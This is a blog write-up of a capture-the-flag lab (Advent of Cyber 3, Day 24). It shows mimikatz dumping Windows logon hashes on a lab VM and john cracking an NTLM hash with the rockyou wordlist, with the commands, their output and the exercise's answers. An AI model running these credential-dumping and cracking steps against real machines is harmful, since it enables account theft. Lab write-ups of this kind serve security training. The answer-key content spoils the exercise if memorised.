Advent Of Cyber 3 - Day 24

Posted on Dec 24, 2021
tl;dr: Post exploitation

On the desktop of the deploy’ed VM, start mimikatz.exe in the x64 folder.

Verify that it works and start dumping hashes:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Grab the NTLM and SHA1 hashes and let’s play around with the NTLM hashes. Save all the found hashes in a file called hash.txt

emily: 8af326aa4850225b75c592d4ce19ccf5
administrator: 001a5b3e266374c0df96a298f7f7419f
└─$ cat hash.txt 

then run the tool john agains the hashes to see if we can crack some of them:

john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
└─$ john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567890       (?)     
1g 0:00:00:00 DONE (2021-12-25 21:17) 1.694g/s 24311Kp/s 24311Kc/s 24311KC/s  _ 09..*7¡Vamos!
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 


└─$ cat output.txt 

so the user: emily has the password: 1234567890

What is the username of the other user on the system?: emily

What is the NTLM hash of this user?: 8af326aa4850225b75c592d4ce19ccf5

What is the password for this user?: 1234567890